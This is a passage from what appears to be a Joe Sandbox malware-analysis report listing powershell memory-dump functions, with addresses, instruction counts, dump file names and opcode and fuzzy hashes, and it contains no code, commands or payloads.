                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e93314b1b24e5a1c32be8e21816a6dfd79d936ef0fab34e16e16edc171763798
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17d3af15ffe3c1858d7ae1a09a784957f6e7b716d53778f08fe2c4a22cc8469a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6111774204754CFC728DF75D08485ABBF6EF8931572589ADD08A8B7A1DB32F842CB50
                                                                                                                                                                                                                                                                                                                                  Function 0367D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2485244583.000000000367D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0367D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_367d000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a0a0f9492affe083afe560de2b76786572457477b54edfeff148cbab8d9f7a48
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9c85bc340bc18fff6153661a52408406cfd22722ae8d0c504abad67969dee1f8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0a0f9492affe083afe560de2b76786572457477b54edfeff148cbab8d9f7a48
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D01DB714053449ED720CE25CD84B67FF9CEF46324F5CC869ED490B346D2799842C6B1
                                                                                                                                                                                                                                                                                                                                  Function 04FDBF10 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1174c2bd8c7f1cb9bb5b4a1ee7de99496b3a7536a8ce5b8d6a9fa9aca7edbf26
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a7760288dc9954ea922eb23e38241ff70cb31d2c4ebe007337caa7c341b6a815
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1174c2bd8c7f1cb9bb5b4a1ee7de99496b3a7536a8ce5b8d6a9fa9aca7edbf26
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71F0F43230A3901FD3118B799C449BB7FE9EB8662071941AAF480C7362C9B0CC048760
                                                                                                                                                                                                                                                                                                                                  Function 0367D006 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2485244583.000000000367D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0367D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_367d000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 477fcac952d4d701e294aa37e23a2cb5d8cfabef17abed4d0cd73af83cc5274b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 28cb4a4498efa8cab539bfe37676168950c3ead814e24d5b5fb70ac31c10c124
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 477fcac952d4d701e294aa37e23a2cb5d8cfabef17abed4d0cd73af83cc5274b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E101407240E3C09ED7128B258994B52BFB8EF57224F1D85DBD9888F297C2695844C772
                                                                                                                                                                                                                                                                                                                                  Function 04FD7958 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e36f8da2f875496f8bc9fc28263e85fed4f340a0dc46ea8ee4f18595511e964c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 22a593a70f4ddf5aaa5b1b269cbcadd6aee58cebc30d9899f7f592135a4be690
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e36f8da2f875496f8bc9fc28263e85fed4f340a0dc46ea8ee4f18595511e964c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12F022316053049FC7019B6998409AF7FE9EF892207100A6EE24ACBB60CF345C02C7A0
                                                                                                                                                                                                                                                                                                                                  Function 0367D9A7 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2485244583.000000000367D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0367D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_367d000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fe468b6d40a2ca6c9cb2d9d0332c66d0bc5a4232f0e8cd88aa9503751364cb36
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: eb3a7291d7e8f83ce35925f73e5e03ff7ca4aff83a232989f9dec889fe4b8ccc
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe468b6d40a2ca6c9cb2d9d0332c66d0bc5a4232f0e8cd88aa9503751364cb36
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67F0F976600600AFD760CF0AD985C23FBADEFD4670719C55AE84A4B712C671EC42CEA0
                                                                                                                                                                                                                                                                                                                                  Function 04FDDEC1 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 504ebe108bcdb4da2d8ddb31764f99c2cb81912175fc20a4ff875538de0ba41e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3444c740c767578a606319b637f06d8bf3d0ef762d895918c9e8929f70b08b98
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 504ebe108bcdb4da2d8ddb31764f99c2cb81912175fc20a4ff875538de0ba41e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51F05835B152818FC3219B2CD494865BFF6AFCA32532912EAE085CF736CA61DC029B91
                                                                                                                                                                                                                                                                                                                                  Function 04FD90D8 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a057fe33e8ebf2a21dc38e5d87fab3bb4ac3562f809546374ec0759fe8a54631
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: be5145bc9bd2601e4f3f118a83fc2a9f69560b9d76313b733796edba76d9862d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a057fe33e8ebf2a21dc38e5d87fab3bb4ac3562f809546374ec0759fe8a54631
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84F0C236B052408BE715AB24C4583AB7BA2DFC5228F14419EC41A8B785CA392847DBA2
                                                                                                                                                                                                                                                                                                                                  Function 04FD7968 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fd13f71df2b4df7526dcca99bc5d7257af2117649d398cb56f2542c44fcb7d65
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3ab10a02e8203ca473a4e7889cbb60e6ea414b13f76e1631fa9de10e9ab4954e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd13f71df2b4df7526dcca99bc5d7257af2117649d398cb56f2542c44fcb7d65
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DF0A7327007189FC7149A69E84496F77EAEBC8271B00052DE20AC7740DF30AD0187A4
                                                                                                                                                                                                                                                                                                                                  Function 0367D998 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2485244583.000000000367D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0367D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_367d000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c931647e7b337b1b014bc094c4f971a02b2e1d2be1b6f2e8d36cfded005ebe76
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8800715f969cc8a218fc053517104720dca6abc75cb38d05f84ac3ed50d8c43e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c931647e7b337b1b014bc094c4f971a02b2e1d2be1b6f2e8d36cfded005ebe76
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50F0F976104680AFD765CF06C985D23BBB9EF89620B29C489E85A5B712C631FC42CF60
                                                                                                                                                                                                                                                                                                                                  Function 04FDDD0F Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f727700e3286fd8c6371a2a8b6002c72ec8bea81f597620d3f373a420503a5bf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ce6bc0e3380865ec47af3573294811a458ad3f0cabe9b4849fdf366e44da9560
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f727700e3286fd8c6371a2a8b6002c72ec8bea81f597620d3f373a420503a5bf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAF02B35246B905BC713972C68148DFBFEADEC613031802AEE04ADB612CE64DC0787F1
                                                                                                                                                                                                                                                                                                                                  Function 04FD7697 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d62c5da28032cbff7c1e1e3361949712883d108f52c3f1ac4b8e874cc1b1b7d4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: aa6c97086d4ff40d61ff4cf645ad3ae4d3005e0b6cb8994b0c39e63dff92c246
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d62c5da28032cbff7c1e1e3361949712883d108f52c3f1ac4b8e874cc1b1b7d4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EF0A039B002048FCB00EB6D9800A9A7BE6EBC865571942A9E909CF325EF24DC028B91
                                                                                                                                                                                                                                                                                                                                  Function 04FD90E8 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bb174df70548b17d3a15cd8cc2554c2bc851360b7a0eb51ead3c0b3f9ca2af4c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1821080931e4910c58b92e3f47ed42b1038deb7ceb9930a50cca8c7e1cfb5f27
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb174df70548b17d3a15cd8cc2554c2bc851360b7a0eb51ead3c0b3f9ca2af4c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FF0E2366002048BE304BB64C4083AB77D6DBC4728F10816EC50A4B788DE396847C7E2
                                                                                                                                                                                                                                                                                                                                  Function 04FD9158 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cb07c066e678c33427164246a0f4784897b32d106cd7f266dd8d319ec47bf625
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8ba09179711a77b9c0952dae3766fec815007512ec017ee88c70b9fa49ae5c50
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb07c066e678c33427164246a0f4784897b32d106cd7f266dd8d319ec47bf625
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87F05E70A0A3444FDB659B78D49C39A7FF1EF46210F1404AED55ED7682CB786882C751
                                                                                                                                                                                                                                                                                                                                  Function 04FDDED0 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 909cb87a248d5311cf4c508bf378937644c09b971ca26682a8c3c5839f43a530
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 69e7f8920312500e850b20b0ea03ee404ab589dde7d1fdbed130598c275fafea
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 909cb87a248d5311cf4c508bf378937644c09b971ca26682a8c3c5839f43a530
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8E09A35B001008F8300AF1DD488D26BBFBEFCE72132900AAF549CB734CA61EC028B90
                                                                                                                                                                                                                                                                                                                                  Function 04FD2C06 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0cdda67f1216d9d116f8b1c502fdf8f7d1de56d9026325fc2aebda0ff89a626f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 735d5f0a80c041b08b99fe72086f8b66ec4579fd4c9bdfe132c9773f0cbac8d3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cdda67f1216d9d116f8b1c502fdf8f7d1de56d9026325fc2aebda0ff89a626f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72F0B235A001099FCB15CB9DD990AEEF7B2FF88324F248199E515A72A1C732AC52CB60
                                                                                                                                                                                                                                                                                                                                  Function 04FDDD60 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c1a1d0568a2c8a08f6e0e9b66d8851f8aeb348ee71bbdca4f0eb4606a52daa46
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 28659b01ce47521e7c37d911765c7f8345b64eb26618f04071cae1832641bfa8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1a1d0568a2c8a08f6e0e9b66d8851f8aeb348ee71bbdca4f0eb4606a52daa46
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07E02B32B05184ABCB29876CD4404E8BFA1EFC8220F1985BED4469B711C971554B8792
                                                                                                                                                                                                                                                                                                                                  Function 04FD9549 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8e5c2c9909737ea5d403cbcc6ac9adb51b16a9f254d443f396c334d009c942fc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d7ce55614166322f639d3370e7015ccbdc2a9e9490555725c57143a2bc86707e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e5c2c9909737ea5d403cbcc6ac9adb51b16a9f254d443f396c334d009c942fc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4E01722B420211B676476F91D00FBBBACB8EC54E9B1D023AD90ADB641ECA0DC1B53E1
                                                                                                                                                                                                                                                                                                                                  Function 04FD9168 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 48719a93bd5103c9914a028e573e5e829f5a95ad3fa65f2b7dc1b6c9ee132489
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 79ca05a27b7b16e1c128512e452382a4e45cfdb6c1144a81d51d1ea05bf02193
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48719a93bd5103c9914a028e573e5e829f5a95ad3fa65f2b7dc1b6c9ee132489
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2F06D709013048BD364DFB8D49C79ABBE5FB44310F00442DD10EC7340DB3968828B90
                                                                                                                                                                                                                                                                                                                                  Function 04FDAF88 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e4ab6edc3385c69b6ebc5a3d00976150cef5569dc5f920d524051e36ac2acf8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4d83c30492d5adcd911d1ae717c5e43091b4ca33939853932d1d6a7d9e616380
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e4ab6edc3385c69b6ebc5a3d00976150cef5569dc5f920d524051e36ac2acf8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFE0CD16B4D3D10F5B2B523D64204A95FF38ACB11431E85FAD084CB606CC518C074395
                                                                                                                                                                                                                                                                                                                                  Function 04FD8978 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 372324108c52acf69ec1746176c76c88f5581c281a2a1b728059c6dad62ab1ba
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: aa122e55076c03e9e04e3f731da30233288d2d7aa7fdd75429b9c63255827881
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 372324108c52acf69ec1746176c76c88f5581c281a2a1b728059c6dad62ab1ba
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE04F3570471497DB093775A41C3AE7A56EBC4729F04002ED60A87341DF69594383EA
                                                                                                                                                                                                                                                                                                                                  Function 04FD8973 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3439ab2cd19efd6a8f0008bf5fde0eca94c52ad0283676033d175b8e95e757b3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f9ee896501e5e9a62afe1c765511f1fda0a28c7a8abc7fa2369357c363bdaf8
